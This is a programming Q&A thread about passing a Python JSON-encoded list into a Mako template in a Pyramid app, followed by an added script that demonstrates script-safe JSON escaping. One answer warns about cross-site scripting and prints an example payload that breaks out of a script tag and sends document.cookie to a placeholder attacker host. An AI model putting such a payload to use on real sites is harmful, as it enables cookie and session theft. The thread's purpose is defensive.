Reputation: 587
I'm reading a text file, splitting it on \n and putting the results in a Python list. I'm then using JSONEncoder().encode(mylist), but the result throws errors as it produces the JavaScript:
var jslist = ["List item 1", "List item 2"]
I'm guessing switching to single quotes would solve this, but it's unclear how to force JSONEncoder/python to use one or the other.
Update: The context is a Pyramid application; here's the end of the function (components is the name of the list):
return {'components': JSONEncoder().encode(components)}
and then in the Mako template:
var components = ${components};
which is being replaced as above.
Upvotes: 0
Views: 739
Reputation: 134038
If you are embedding the JSON on an HTML page, beware. As Mako does not know about script tags, it goes on to escape the string using the standard escapes. However, a <script> tag has different escaping rules. Notably, NOT escaping makes your site prone to Cross-Site Scripting attacks if the JSON contains user-generated data. Consider the following info in a user-editable field (user.name):
user.name = "</script><script language='javascript'>" +
"document.write('<img src=\'http://ev1l.com/stealcookies/?'" +
"+ document.cookie + '/>');</script><script language='vbscript'>"
Alas, the Python JSON encoder does not have an option for safely encoding JSON so that it is embeddable within HTML - or even JavaScript (a bug has been entered into the Python bug db). Meanwhile you should use ensure_ascii=True + replace all '<' with '\\u003c' to avoid hacking by malicious users.
Upvotes: 0
Reputation: 23331
Mako is escaping your strings because it's a sane default for most purposes. You can turn off the escaping on a case-by-case basis:
${components | n}
Upvotes: 3
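The encoding step the first answer recommends, as it would be used together with the ${components | n} filter from the second answer. This is an added example, not code from either poster: the function names, the constructed sample payload and the string-formatting stand-in for the Mako template line are assumptions, and escaping '>' and '&' goes beyond the answer's '<' replacement.

```python
import json

# Constructed sample: a list where one entry came from a user-editable field.
HOSTILE_LIST = ["List item 1", "</script><script>alert(1)</script>"]


def naive_json(value):
    """Plain JSON as in the question; unsafe once HTML escaping is turned off."""
    return json.dumps(value)


def script_safe_json(value):
    """JSON text that cannot close or open a tag inside a <script> block.

    ensure_ascii=True turns every non-ASCII character (including U+2028 and
    U+2029) into a \\uXXXX escape. '<', '>' and '&' can only occur inside JSON
    string literals, so replacing them globally with their \\uXXXX escapes
    changes the markup seen by the HTML parser but not the decoded value.
    """
    encoded = json.dumps(value, ensure_ascii=True)
    return (encoded.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_script(js_literal):
    """Stand-in for the template line: var components = ${components | n};"""
    return "<script>var components = %s;</script>" % js_literal


def breaks_out(html):
    """True if the embedded data ends the script element before its real end tag."""
    body = html[len("<script>"):-len("</script>")]
    return "</script" in body.lower()


if __name__ == "__main__":
    for encoder in (naive_json, script_safe_json):
        page = render_script(encoder(HOSTILE_LIST))
        print(encoder.__name__, "breaks out of <script>:", breaks_out(page))
        print("  ", page)
```

In the Pyramid view this would mean returning {'components': script_safe_json(components)} and keeping the | n filter in the template, so the value is escaped exactly once and for the right context.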